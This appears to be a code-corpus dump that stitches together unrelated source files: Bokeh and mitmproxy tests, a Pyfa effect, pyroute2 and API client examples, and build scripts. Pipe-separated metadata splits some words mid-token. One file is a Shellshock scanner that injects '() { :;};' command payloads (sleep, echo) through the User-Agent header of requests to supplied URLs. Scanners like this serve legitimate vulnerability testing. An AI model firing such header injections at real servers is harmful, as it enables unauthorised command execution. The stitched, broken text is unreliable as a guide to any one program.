        assert s._connection._arguments is None
        assert s._connection.io_loop == "io_loop"
        assert isinstance(s.id, string_types)
        assert len(s.id) == 44

    def test_creation_with_arguments(self):
        s = bcs.ClientSession(arguments="args")
        assert s.connected == False
        assert s.document is None
        assert s._connection._arguments == "args"
        assert len(s.id) == 44

    @patch("bokeh.client.connection.ClientConnection.connect")
    def test_connect(self, mock_connect):
        s = bcs.ClientSession()
        s.connect()
        assert mock_connect.call_count == 1
        assert mock_connect.call_args[0] == ()
        assert mock_connect.call_args[1] == {}

    @patch("bokeh.client.connection.ClientConnection.close")
    def test_close(self, mock_close):
        s = bcs.ClientSession()
        s.close()
        # Default close reason is "closed".
        assert mock_close.call_count == 1
        assert mock_close.call_args[0] == ("closed",)
        assert mock_close.call_args[1] == {}

    @patch("bokeh.client.connection.ClientConnection.close")
    def test_context_manager(self, mock_close):
        # Leaving the with-block must close the session.
        with bcs.ClientSession() as session:
            assert isinstance(session, bcs.ClientSession)
        assert mock_close.call_count == 1
        assert mock_close.call_args[0] == ("closed",)
        assert mock_close.call_args[1] == {}

    @patch("bokeh.client.connection.ClientConnection.close")
    def test_close_with_why(self, mock_close):
        s = bcs.ClientSession()
        s.close("foo")
        # An explicit close reason is passed through verbatim.
        assert mock_close.call_count == 1
        assert mock_close.call_args[0] == ("foo",)
        assert mock_close.call_args[1] == {}

    @patch("bokeh.client.connection.ClientConnection.force_roundtrip")
    def test_force_roundtrip(self, mock_force_roundtrip):
        s = bcs.ClientSession()
        s.force_roundtrip()
        assert mock_force_roundtrip.call_count == 1
        assert mock_force_roundtrip.call_args[0] == ()
        assert mock_force_roundtrip.call_args[1] == {}

    @patch("warnings.warn")
    @patch("bokeh.client.connection.ClientConnection.loop_until_closed")
    def test_loop_until_closed(self, mock_loop_until_closed, mock_warn):
        # loop_until_closed is discouraged for apps; a warning must be issued.
        s = bcs.ClientSession()
        s.loop_until_closed()
        assert mock_loop_until_closed.call_count == 1
        assert mock_loop_until_closed.call_args[0] == ()
        assert mock_loop_until_closed.call_args[1] == {}
        assert mock_warn.call_count == 1
        assert mock_warn.call_args[0] == (bcs._BOKEH_CLIENT_APP_WARNING_FULL,)
        assert mock_warn.call_args[1] == {}

    @patch("warnings.warn")
    @patch("bokeh.client.connection.ClientConnection.loop_until_closed")
    def test_loop_until_closed_suppress_warnings(self, mock_loop_until_closed, mock_warn):
        # Passing True suppresses the warning.
        s = bcs.ClientSession()
        s.loop_until_closed(True)
        assert mock_loop_until_closed.call_count == 1
        assert mock_loop_until_closed.call_args[0] == ()
        assert mock_loop_until_closed.call_args[1] == {}
        assert mock_warn.call_count == 0

    @patch("bokeh.client.connection.ClientConnection.request_server_info")
    def test_request_server_info(self, mock_request_server_info):
        s = bcs.ClientSession()
        s.request_server_info()
        assert mock_request_server_info.call_count == 1
        assert mock_request_server_info.call_args[0] == ()
        assert mock_request_server_info.call_args[1] == {}
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
skapfer/rubber | src/latex_modules/dvips.py | Python | gpl-2.0 | 278 | 0.010791 | # This file is part of Rubber and thus covere | d by the GPL
import rubber.dvip_tool
import rubber.module_interface
class Module (rubber.module_interface.Module):
    """Rubber module that runs ``dvips`` to turn the DVI output into PostScript."""

    def __init__ (self, document, opt):
        """Attach a dvips dependency node to *document* (*opt* is accepted but unused)."""
        self.dep = rubber.dvip_tool.Dvip_Tool_Dep_Node (document, 'dvips')
bsmr-eve/Pyfa | eos/effects/remotetargetpaintentity.py | Python | gpl-3.0 | 366 | 0.002732 | # remoteTargetPaintEntity
#
# U | sed by:
# Drones named like: TP (3 of 3)
# Effect category flags consumed by the eos effect loader.
type = "projected", "active"


def handler(fit, container, context, *args, **kwargs):
    """Apply the target painter's signature-radius bloom to the victim ship.

    Only acts when the effect reaches the fit in a "projected" context;
    the boost is stacking-penalized like other signature modifiers.
    """
    if "projected" not in context:
        return
    bonus = container.getModifiedItemAttr("signatureRadiusBonus")
    fit.ship.boostItemAttr("signatureRadius", bonus,
                           stackingPenalties=True, *args, **kwargs)
|
mosajjal/mitmproxy | test/mitmproxy/addons/test_stickycookie.py | Python | mit | 4,831 | 0.000828 | import pytest
from mitmproxy.test import tflow
from mitmproxy.test import taddons
from mitmproxy.addons impor | t stickycookie
from mitmproxy.test import tutils as ntutils
def test_domain_match():
    """Both the bare domain and its subdomains match a leading-dot pattern."""
    for host in ("www.google.com", "google.com"):
        assert stickycookie.domain_match(host, ".google.com")
class TestStickyCookie:
    """Behavioural tests for the stickycookie addon's cookie jar."""

    def test_config(self):
        sc = stickycookie.StickyCookie()
        with taddons.context() as tctx:
            # An invalid filter expression must be rejected at configure time.
            with pytest.raises(Exception, match="invalid filter"):
                tctx.configure(sc, stickycookie="~b")
            tctx.configure(sc, stickycookie="foo")
            assert sc.flt
            tctx.configure(sc, stickycookie=None)
            assert not sc.flt

    def test_simple(self):
        sc = stickycookie.StickyCookie()
        with taddons.context() as tctx:
            tctx.configure(sc, stickycookie=".*")
            f = tflow.tflow(resp=True)
            f.response.headers["set-cookie"] = "foo=bar"
            sc.request(f)
            f.reply.acked = False
            sc.response(f)
            # The cookie is stored but not yet replayed on the original flow.
            assert sc.jar
            assert "cookie" not in f.request.headers
            f = f.copy()
            sc.request(f)
            assert f.request.headers["cookie"] == "foo=bar"

    def _response(self, sc, cookie, host):
        # Helper: push a response carrying *cookie* from *host* through the addon.
        f = tflow.tflow(req=ntutils.treq(host=host, port=80), resp=True)
        f.response.headers["Set-Cookie"] = cookie
        sc.response(f)
        return f

    def test_response(self):
        sc = stickycookie.StickyCookie()
        with taddons.context() as tctx:
            tctx.configure(sc, stickycookie=".*")
            c = "SSID=mooo; domain=.google.com, FOO=bar; Domain=.google.com; Path=/; " \
                "Expires=Wed, 13-Jan-2021 22:23:01 GMT; Secure; "
            # Domain-scoped cookies from an unrelated host must be rejected.
            self._response(sc, c, "host")
            assert not sc.jar.keys()
            self._response(sc, c, "www.google.com")
            assert sc.jar.keys()
            sc.jar.clear()
            self._response(sc, "SSID=mooo", "www.google.com")
            assert list(sc.jar.keys())[0] == ('www.google.com', 80, '/')

    def test_response_multiple(self):
        sc = stickycookie.StickyCookie()
        with taddons.context() as tctx:
            tctx.configure(sc, stickycookie=".*")
            # Test setting of multiple cookies
            c1 = "somecookie=test; Path=/"
            c2 = "othercookie=helloworld; Path=/"
            f = self._response(sc, c1, "www.google.com")
            f.response.headers["Set-Cookie"] = c2
            sc.response(f)
            googlekey = list(sc.jar.keys())[0]
            assert len(sc.jar[googlekey].keys()) == 2

    def test_response_weird(self):
        sc = stickycookie.StickyCookie()
        with taddons.context() as tctx:
            tctx.configure(sc, stickycookie=".*")
            # Test setting of weird cookie keys
            f = tflow.tflow(req=ntutils.treq(host="www.google.com", port=80), resp=True)
            cs = [
                "foo/bar=hello",
                "foo:bar=world",
                "foo@bar=fizz",
            ]
            for c in cs:
                f.response.headers["Set-Cookie"] = c
                sc.response(f)
            googlekey = list(sc.jar.keys())[0]
            assert len(sc.jar[googlekey].keys()) == len(cs)

    def test_response_overwrite(self):
        sc = stickycookie.StickyCookie()
        with taddons.context() as tctx:
            tctx.configure(sc, stickycookie=".*")
            # Test overwriting of a cookie value
            c1 = "somecookie=helloworld; Path=/"
            c2 = "somecookie=newvalue; Path=/"
            f = self._response(sc, c1, "www.google.com")
            f.response.headers["Set-Cookie"] = c2
            sc.response(f)
            googlekey = list(sc.jar.keys())[0]
            assert len(sc.jar[googlekey].keys()) == 1
            assert list(sc.jar[googlekey]["somecookie"].items())[0][1] == "newvalue"

    def test_response_delete(self):
        sc = stickycookie.StickyCookie()
        with taddons.context() as tctx:
            tctx.configure(sc, stickycookie=".*")
            # Test that a cookie is be deleted
            # by setting the expire time in the past
            f = self._response(sc, "duffer=zafar; Path=/", "www.google.com")
            f.response.headers["Set-Cookie"] = "duffer=; Expires=Thu, 01-Jan-1970 00:00:00 GMT"
            sc.response(f)
            assert not sc.jar.keys()

    def test_request(self):
        sc = stickycookie.StickyCookie()
        with taddons.context() as tctx:
            tctx.configure(sc, stickycookie=".*")
            f = self._response(sc, "SSID=mooo", "www.google.com")
            assert "cookie" not in f.request.headers
            sc.request(f)
            assert "cookie" in f.request.headers
SleepProgger/another_shellshock_test | shellshock_cgi.py | Python | gpl-2.0 | 2,092 | 0.00956 | #!/usr/bin/env python
import urllib2
import time
import random
import string
randstr = lambda n: ''.join(random.choice(string.ascii_letters + string.digits) for i in xrange(n))
def timing_attack(url, request_type="HEAD", data=None, headers=None, sleeptime = 3, cmd='() { :;}; PATH="/bin:/usr/bin:/usr/local/bin:$PATH" sleep %f'):
    """Probe *url* for Shellshock with a timing side channel.

    Sends one baseline request, then repeats it with a crafted User-Agent
    carrying *cmd* (a ``sleep`` payload parameterised by *sleeptime*).
    Returns True when the payloaded request takes at least *sleeptime*
    seconds longer than the baseline, i.e. the server likely executed it.

    :raises Exception: for request types other than HEAD/GET/POST.
    """
    request_type = request_type.upper()
    if request_type not in ("HEAD", "GET", "POST"):
        raise Exception("Illegal request type '%s'" % request_type)
    if headers is None: headers = {}
    r = urllib2.Request(url, data, headers)
    r.get_method = lambda : request_type
    # Baseline timing without the payload.
    otime = -time.time()
    response = urllib2.urlopen(r)
    otime += time.time()
    # somehow add_header doesn't work for user-agent and py2.7
    r.add_unredirected_header("User-Agent", cmd % (sleeptime,))
    htime = -time.time()
    response = urllib2.urlopen(r)
    htime += time.time()
    return htime >= sleeptime and htime > otime
def text_attack(url, request_type="GET", data=None, headers=None):
    """Probe *url* for Shellshock by echoing a random marker.

    Injects ``() { :;}; echo '<marker>'`` via the User-Agent header and
    returns True when the marker appears in the response body.

    :raises Exception: for request types other than GET/POST.
    """
    request_type = request_type.upper()
    if request_type not in ("GET", "POST"):
        raise Exception("Illegal request type '%s'" % request_type)
    if headers is None: headers = {}
    needle = randstr(20)
    r = urllib2.Request(url, data, headers)
    # Header is set both ways: plain add_header alone is unreliable for
    # User-Agent on py2.7 (see the note in timing_attack).
    r.add_unredirected_header("User-Agent", '() { :;}; echo \'%s\'' % (needle,))
    r.add_header("User-Agent", '() { :;}; echo \'%s\'' % (needle,))
    r.get_method = lambda : request_type
    response = urllib2.urlopen(r)
    return needle in response.read()
if __name__ == '__main__':
    import sys
    # Target URLs come from argv, or from stdin when none are given.
    if len(sys.argv) < 2:
        urls = sys.stdin.readlines()
    else:
        urls = sys.argv[1:]
    for url in urls:
        print "- testing:", url
        try:
            print "Timing attack vulnerable:",
            print timing_attack(url, "GET")
            print "Known text attack vulnerable:",
            print text_attack(url, "GET")
            print
        except urllib2.HTTPError as he:
            # Keep scanning the remaining URLs on a per-target HTTP failure.
            print "Request error:", he
jazzmes/pyroute2 | examples/ipdb_routes.py | Python | gpl-2.0 | 503 | 0 | from pyroute2 impo | rt IPDB
ip = IPDB()
# create dummy interface to host routes on
ip.create(kind='dummy', ifname='pr2test').\
add_ip('172.16.1.1/24').\
up().\
commit()
# create a route
with ip.routes.add({'dst': '172.16.0.0/24',
'gateway': '172.16.1.2'}) as r:
pass
# modify it
with ip.routes['172.16.0.0/24'] as r:
r.gateway = '172.16.1.3'
# cleanup
with ip.routes['172.16.0.0/24'] as r:
r.remove()
ip.interfaces.pr2test.remov | e().commit()
ip.release()
|
edisonlz/fruit | web_project/base/youkuapi/show.py | Python | apache-2.0 | 2,122 | 0.005666 | #coding=utf-8
from base import BaseApi
import settings
class ShowApi(BaseApi):
    """
    Show (TV program) API client.
    """
    # All show fields the upstream data service can return.
    FD = ['showid', 'pk_odshow', 'showname', 'showsubtitle', 'deschead', 'showdesc', 'show_thumburl', 'show_vthumburl',
          'show_bannerurl', 'showlength', 'copyright_status', 'paid', 'pay_type', 'onlinetime', 'hasvideotype',
          'firstepisode_videoid', 'firstepisode_videotitle', 'firstepisode_videorctitle', 'firstepisode_thumburl',
          'firstepisode_thumburl_v2', 'lastepisode_videoid', 'lastepisode_videotitle', 'lastepisode_videorctitle',
          'lastepisode_thumburl', 'lastepisode_thumburl', 'showtotal_vv', 'device_disabled', 'trailer_videoid',
          'episode_last', 'episode_total']
    # Default field-description string: all fields, space separated.
    fd = ' '.join(FD)
    HOST = settings.SHOW_HOST
    FORMAT = "json"

    @classmethod
    def get_show_info(cls, show_id, fd=None, **kwargs):
        """
        :param str show_id: youku video id
        :param str fd: field description default cls.fd
        :param dict kwargs: params
        :raises ValueError: if the show_id is None
        :return wiki: http://wiki.1verge.net/webdev:ds:show

        get video info api code sample::

            ShowApi.get_show_info("xasdtmmdx12")
        """
        if not fd:
            fd = cls.fd
        path='/show'
        q = {}
        q.update({'showid': show_id})
        q.update(kwargs)
        # Query syntax is "key:value" pairs joined by spaces.
        q_str = ' '.join(["{k}:{v}".format(k=k, v=v) for k, v in q.iteritems()])
        params = {"ft": cls.FORMAT, "q": q_str, "fd": fd}
        headers = {'X-Forwarded-For': kwargs.get("ip")}
        info = cls.get_json(cls.HOST, path, params, headers)
        try:
            if info.get('results') is False:
                return {}
            else:
                return info.get('results', [{}, ])[0]
        except TypeError:
            # NOTE(review): best-effort logging when the service returns a
            # non-dict payload; callers receive None in that case.
            print 'fetch error'
            print info
# Ad-hoc smoke test against the live API (Python 2 only).
if __name__ == '__main__':
    print ShowApi.get_show_info('f108ae9e270811e2b356')
    ret = ShowApi.get_show_info('188d6318525711e3b8b7')
    import json
    print json.dumps(ret, ensure_ascii=False, sort_keys=True, indent=4)
|
huan/Underscore | examples/class_method.py | Python | mit | 84 | 0.02381 | class Foo(o | bject):
def run(self):
return 3
print(Foo().run( | ))
|
bobsummerwill/solidity | scripts/fix_homebrew_paths_in_standalone_zip.py | Python | gpl-3.0 | 2,861 | 0.001049 | # ------------------------------------------------------------------------------
# This Python script is used within the OS X release process, to ensure
# that the standalone OS X ZIP files which we make are actually
# standalone, and not implicitly dependent on Homebrew installs for
# external libraries which we use.
#
# This implicit dependencies seem to show up only where we have
# external dependencies which are dependent on each other, and the
# path from one to another is an absolute path to "/usr/local/opt",
# the Homebrew install location. External dependencies which only
# depend on system libraries are fine. Our main applications seem
# to be fine.
#
# An example of a dependency which requires this fix-up at the time
# of writing is the following dependency edge:
#
# libjsonrpccpp-client.0.dylib
# -> /usr/local/opt/jsoncpp/lib/libjsoncpp.0.dylib
#
# See https://blogs.oracle.com/dipol/entry/dynamic_libraries_rpath_and_mac
# for a little overview of "install_name_tool" and "otool".
#
# ------------------------------------------------------------------------------
# This file is part of solidity.
#
# solidity is free software: you can redistribute it and/or modify
# it | under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# solidity is distributed in the | hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with solidity. If not, see <http://www.gnu.org/licenses/>
#
# (c) 2016 solidity contributors.
# -----------------------------------------------------------------------------
import os
import subprocess
import sys
def readDependencies(fname):
    """Rewrite Homebrew/user-local install names in *fname* to @executable_path.

    Runs ``otool -L`` on the binary, and for every dependency living under
    /usr/local/lib, /usr/local/opt or /Users/, rewrites its install name
    with ``install_name_tool`` so the dylib is looked up next to the
    executable instead of in the Homebrew tree.
    """
    # NOTE(review): the handle ``f`` is opened but never read — the
    # dependency list comes from otool.  The ``with open`` effectively only
    # checks that *fname* exists and is readable; confirm before removing.
    with open(fname) as f:
        o = subprocess.Popen(['otool', '-L', fname], stdout=subprocess.PIPE)
        for line in o.stdout:
            if line[0] == '\t':
                # Dependency lines look like "\t<path> (compatibility ...)";
                # keep only the path, dropping the leading tab.
                library = line.split(' ', 1)[0][1:]
                if library.startswith("/usr/local/lib") or library.startswith("/usr/local/opt") or library.startswith("/Users/"):
                    # Never rewrite a library's reference to itself.
                    if (os.path.basename(library) != os.path.basename(fname)):
                        command = "install_name_tool -change " + \
                            library + " @executable_path/./" + \
                            os.path.basename(library) + " " + fname
                        print(command)
                        # install_name_tool needs a writable file.
                        os.system("chmod +w " + fname)
                        os.system(command)
# Walk the release directory given on the command line and fix up every file.
root = sys.argv[1]
for (dirpath, dirnames, filenames) in os.walk(root):
    for filename in filenames:
        # Join with *dirpath*, not *root*: os.walk yields filenames relative
        # to dirpath, so joining with root produced non-existent paths for
        # files inside subdirectories.
        readDependencies(os.path.join(dirpath, filename))
|
MarioVilas/secondlife-experiments | SimProxy/udpfilter/FollowTeleports.py | Python | gpl-2.0 | 1,706 | 0.010551 | from PacketFilterBase import *
class FollowTeleportsFilter(PacketFilterBase):
    """Keep the viewer talking to the proxy across sim changes.

    Every server->viewer message that announces a new simulator endpoint
    (OpenCircuit, CrossedRegion, EnableSimulator, TeleportFinish) is
    intercepted: the real sim address is registered with the proxy and
    replaced in the packet by the proxy's local address, so teleports and
    region crossings stay under proxy control.
    """

    def __newSim(self, packet, info_key, ip_key, port_key):
        """Register the sim endpoint found in *packet* and rewrite it in place."""
        decodedData = packet.getDecodedData()
        circuit_info = decodedData[info_key]
        sim_ip = circuit_info[ip_key]
        sim_port = circuit_info[port_key]
        new_ip, new_port = self.proxy.newSim( (sim_ip, sim_port) )
        circuit_info[ip_key] = new_ip
        circuit_info[port_key] = new_port
        packet.setDecodedData(decodedData)
        return packet

    def OpenCircuit(self, fromViewer, packet):
        """Rewrite the circuit address on server-originated OpenCircuit."""
        if not fromViewer:
            packet = self.__newSim(packet, 'CircuitInfo', 'IP', 'Port')
        return False, packet

    def CrossedRegion(self, fromViewer, packet):
        """Rewrite the sim address when the avatar crosses a region edge."""
        if not fromViewer:
            packet = self.__newSim(packet, 'RegionData', 'SimIP', 'SimPort')
        return False, packet

    def EnableSimulator(self, fromViewer, packet):
        """Rewrite the address of a neighbouring simulator being enabled."""
        if not fromViewer:
            packet = self.__newSim(packet, 'SimulatorInfo', 'IP', 'Port')
        return False, packet

    def TeleportFinish(self, fromViewer, packet):
        """Rewrite the destination sim address at the end of a teleport."""
        if not fromViewer:
            packet = self.__newSim(packet, 'Info', 'SimIP', 'SimPort')
        return False, packet
|
tiborsimko/invenio-records-rest | invenio_records_rest/serializers/response.py | Python | mit | 2,527 | 0 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Serialization response factories.
Responsible for creating a HTTP response given the output of a serializer.
"""
from __future__ import absolute_import, print_function
from flask import current_app
def record_responsify(serializer, mimetype):
    """Create a Records-REST response serializer.

    :param serializer: Serializer instance.
    :param mimetype: MIME type of response.
    :returns: Function that generates a record HTTP response.
    """
    def view(pid, record, code=200, headers=None, links_factory=None):
        """Render *record* as an HTTP response with the bound mimetype."""
        payload = serializer.serialize(pid, record, links_factory=links_factory)
        response = current_app.response_class(payload, mimetype=mimetype)
        response.status_code = code
        # Cache validators (ETag / Last-Modified) derive from the record.
        response.set_etag(str(record.revision_id))
        response.last_modified = record.updated
        if headers is not None:
            response.headers.extend(headers)
        if links_factory is not None:
            add_link_header(response, links_factory(pid))
        return response

    return view
def search_responsify(serializer, mimetype):
    """Create a Records-REST search result response serializer.

    :param serializer: Serializer instance.
    :param mimetype: MIME type of response.
    :returns: Function that generates a record HTTP response.
    """
    def view(pid_fetcher, search_result, code=200, headers=None, links=None,
             item_links_factory=None):
        """Render a search result page as an HTTP response."""
        payload = serializer.serialize_search(pid_fetcher, search_result,
                                              links=links,
                                              item_links_factory=item_links_factory)
        response = current_app.response_class(payload, mimetype=mimetype)
        response.status_code = code
        if headers is not None:
            response.headers.extend(headers)
        if links is not None:
            add_link_header(response, links)
        return response

    return view
def add_link_header(response, links):
    """Add a Link HTTP header to a REST response.

    :param response: REST response instance
    :param links: Dictionary of links (rel -> URL); None is a no-op
    """
    if links is None:
        return
    parts = ['<{0}>; rel="{1}"'.format(target, rel)
             for rel, target in links.items()]
    response.headers.extend({'Link': ', '.join(parts)})
|
dongjoon-hyun/tensorflow | tensorflow/python/autograph/core/errors_test.py | Python | apache-2.0 | 3,793 | 0.006591 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for errors module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.autograph.core import errors
from tensorflow.python.autograph.pyct import origin_info
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors as tf_errors
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.util import tf_inspect
def zero_div():
    # Build a graph op that divides by zero; evaluating it raises
    # InvalidArgumentError at session-run time, not at graph build time.
    x = array_ops.constant(10, dtype=dtypes.int32)
    return x // 0
def zero_div_caller():
    # Extra stack frame so the traceback-rewriting tests have a frame to map.
    return zero_div()
class RuntimeErrorsTest(test.TestCase):
    """Checks that autograph rewrites runtime tracebacks via ag_source_map."""

    def fake_origin(self, function, line_offset):
        # Build a synthetic source-map entry pointing at *function*'s source
        # shifted by *line_offset* lines.
        _, lineno = tf_inspect.getsourcelines(function)
        filename = tf_inspect.getsourcefile(function)
        lineno += line_offset
        loc = origin_info.LineLocation(filename, lineno)
        origin = origin_info.OriginInfo(loc, 'test_function_name', 'test_code',
                                        'test_comment')
        return loc, origin

    def test_improved_errors_basic(self):
        loc, origin = self.fake_origin(zero_div, 2)
        zero_div_caller.ag_source_map = {loc: origin}
        ops = zero_div_caller()
        with self.assertRaises(errors.TfRuntimeError) as cm:
            with errors.improved_errors(zero_div_caller):
                with self.cached_session() as sess:
                    sess.run(ops)
        # The mapped frame must replace the generated one.
        for frame in cm.exception.custom_traceback:
            _, _, function_name, _ = frame
            self.assertNotEqual('zero_div', function_name)
        self.assertIn(origin.as_frame(), set(cm.exception.custom_traceback))

    def test_improved_errors_no_matching_lineno(self):
        # A source map whose line numbers do not match leaves frames untouched.
        loc, origin = self.fake_origin(zero_div, -1)
        zero_div_caller.ag_source_map = {loc: origin}
        ops = zero_div_caller()
        with self.assertRaises(errors.TfRuntimeError) as cm:
            with errors.improved_errors(zero_div_caller):
                with self.cached_session() as sess:
                    sess.run(ops)
        all_function_names = set()
        for frame in cm.exception.custom_traceback:
            _, _, function_name, _ = frame
            all_function_names.add(function_name)
            self.assertNotEqual('test_function_name', function_name)
        self.assertIn('zero_div', all_function_names)

    def test_improved_errors_failures(self):
        loc, _ = self.fake_origin(zero_div, 2)
        # A malformed source map must not mask the underlying TF error.
        zero_div_caller.ag_source_map = {loc: 'bogus object'}
        ops = zero_div_caller()
        with self.assertRaises(tf_errors.InvalidArgumentError):
            with errors.improved_errors(zero_div_caller):
                with self.cached_session() as sess:
                    sess.run(ops)

    def test_improved_errors_validation(self):
        # improved_errors only accepts functions produced by autograph.to_graph.
        with self.assertRaisesRegexp(
                ValueError,
                'converted_function must be the result of an autograph.to_graph call'):
            errors.improved_errors(zero_div).__enter__()
        with self.assertRaisesRegexp(
                ValueError,
                'converted_function must be the result of an autograph.to_graph call'):
            zero_div_caller.ag_source_map = 'not a dict'
            errors.improved_errors(zero_div_caller).__enter__()
if __name__ == '__main__':
    # Run via the TensorFlow test runner when executed directly.
    test.main()
|
zhangjiajie/tax_benchmark | script/ete2/clustering/__init__.py | Python | gpl-3.0 | 1,549 | 0.008393 | __VERS | ION__="ete2-2.2rev1026"
# -*- coding: utf-8 -*-
# #START_LICENSE###########################################################
#
#
# This file is part of the Environment for Tree Exploration pro | gram
# (ETE). http://ete.cgenomics.org
#
# ETE is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ETE is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ETE. If not, see <http://www.gnu.org/licenses/>.
#
#
# ABOUT THE ETE PACKAGE
# =====================
#
# ETE is distributed under the GPL copyleft license (2008-2011).
#
# If you make use of ETE in published work, please cite:
#
# Jaime Huerta-Cepas, Joaquin Dopazo and Toni Gabaldon.
# ETE: a python Environment for Tree Exploration. Jaime BMC
# Bioinformatics 2010,:24doi:10.1186/1471-2105-11-24
#
# Note that extra references to the specific methods implemented in
# the toolkit are available in the documentation.
#
# More info at http://ete.cgenomics.org
#
#
# #END_LICENSE#############################################################
from clustertree import *
__all__ = clustertree.__all__
|
alexa-infra/negine | thirdparty/boost-python/libs/python/pyste/src/Pyste/EnumExporter.py | Python | mit | 2,214 | 0.006323 | # Copyright Bruno da Silva de Oliveira 2003. Use, modification and
# distribution is subject to the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
from Exporter import Exporter
from settings import *
import utils
#==============================================================================
# EnumExporter
#==============================================================================
class EnumExporter(Exporter):
    'Exports enumerators'

    def __init__(self, info):
        Exporter.__init__(self, info)

    def SetDeclarations(self, declarations):
        """Cache the enum declaration named by self.info, if any was parsed."""
        Exporter.SetDeclarations(self, declarations)
        if self.declarations:
            self.enum = self.GetDeclaration(self.info.name)
        else:
            self.enum = None

    def Export(self, codeunit, exported_names):
        """Emit Boost.Python code exposing the enum into *codeunit*.

        Named enums become ``enum_<T>("name").value(...)`` chains; unnamed
        enums (generated names starting with "$_" or "._") are exported as
        plain integer attributes on the current scope instead.
        """
        if self.info.exclude:
            return
        indent = self.INDENT
        in_indent = self.INDENT*2
        rename = self.info.rename or self.enum.name
        full_name = self.enum.FullName()
        unnamed_enum = False
        # Pyste marks anonymous enums with generated "$_"/"._" names.
        if rename.startswith('$_') or rename.startswith('._'):
            unnamed_enum = True
        code = ''
        if not unnamed_enum:
            code += indent + namespaces.python
            code += 'enum_< %s >("%s")\n' % (full_name, rename)
        for name in self.enum.values:
            # Each enum value may carry its own rename in the user's info map.
            rename = self.info[name].rename or name
            value_fullname = self.enum.ValueFullName(name)
            if not unnamed_enum:
                code += in_indent + '.value("%s", %s)\n' % (rename, value_fullname)
            else:
                code += indent + namespaces.python
                code += 'scope().attr("%s") = (int)%s;\n' % (rename, value_fullname )
        if self.info.export_values and not unnamed_enum:
            code += in_indent + '.export_values()\n'
        if not unnamed_enum:
            code += indent + ';\n'
        code += '\n'
        codeunit.Write('module', code)
        # Record the enum as exported so dependent exporters can see it.
        exported_names[self.enum.FullName()] = 1

    def Name(self):
        return self.info.name
|
atsuyim/OpenBazaar | tests/test_transport.py | Python | mit | 2,556 | 0.002347 | import unittest
from node.openbazaar_daemon import OpenBazaarContext
import mock
from node import transport
def get_mock_open_bazaar_context():
    """Build the default-configured OpenBazaarContext used by these tests."""
    ctx = OpenBazaarContext.create_default_instance()
    return ctx
class TestTransportLayerCallbacks(unittest.TestCase):
    """Test the callback features of the TransportLayer class."""

    def setUp(self):
        """Register section callbacks plus a pair with pass/fail validators."""
        # For testing sections
        self.callback1 = mock.Mock()
        self.callback2 = mock.Mock()
        self.callback3 = mock.Mock()
        self.validator1 = mock.Mock()
        self.validator2 = mock.Mock()
        self.validator3 = mock.Mock()
        ob_ctx = get_mock_open_bazaar_context()
        ob_ctx.nat_status = {'nat_type': 'Restric NAT'}
        guid = 1
        nickname = None
        self.transport_layer = transport.TransportLayer(ob_ctx, guid, nickname)
        self.transport_layer.add_callback('section_one', {'cb': self.callback1, 'validator_cb': self.validator1})
        self.transport_layer.add_callback('section_one', {'cb': self.callback2, 'validator_cb': self.validator2})
        # 'all' callbacks fire for every section.
        self.transport_layer.add_callback('all', {'cb': self.callback3, 'validator_cb': self.validator3})
        # For testing validators: validator4 passes, validator5 rejects.
        self.callback4 = mock.Mock()
        self.callback5 = mock.Mock()
        self.validator4 = mock.Mock(return_value=True)
        self.validator5 = mock.Mock(return_value=False)
        self.transport_layer.add_callback('section_two', {'cb': self.callback4, 'validator_cb': self.validator4})
        self.transport_layer.add_callback('section_two', {'cb': self.callback5, 'validator_cb': self.validator5})

    def _assert_called(self, one, two, three):
        # Shorthand: expected call counts for callbacks 1..3.
        self.assertEqual(self.callback1.call_count, one)
        self.assertEqual(self.callback2.call_count, two)
        self.assertEqual(self.callback3.call_count, three)

    def test_fixture(self):
        self._assert_called(0, 0, 0)

    def test_callbacks(self):
        self.transport_layer.trigger_callbacks('section_one', None)
        self._assert_called(1, 1, 1)

    def test_all_callback(self):
        # Only the 'all' callback fires for unregistered sections.
        self.transport_layer.trigger_callbacks('section_with_no_register', None)
        self._assert_called(0, 0, 1)

    def test_validators(self):
        # A callback runs only when its validator returns a truthy value.
        self.transport_layer.trigger_callbacks('section_two', None)
        self.assertEqual(self.validator4.call_count, 1)
        self.assertEqual(self.validator5.call_count, 1)
        self.assertEqual(self.callback4.call_count, 1)
        self.assertEqual(self.callback5.call_count, 0)
if __name__ == "__main__":
    # Allow running this test module directly.
    unittest.main()
|
NovaPointGroup/purchase-workflow | purchase_all_shipments/__openerp__.py | Python | agpl-3.0 | 978 | 0 | # Author: Leonardo Pistone
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Fre | e Software Foundation, either version 3 of the
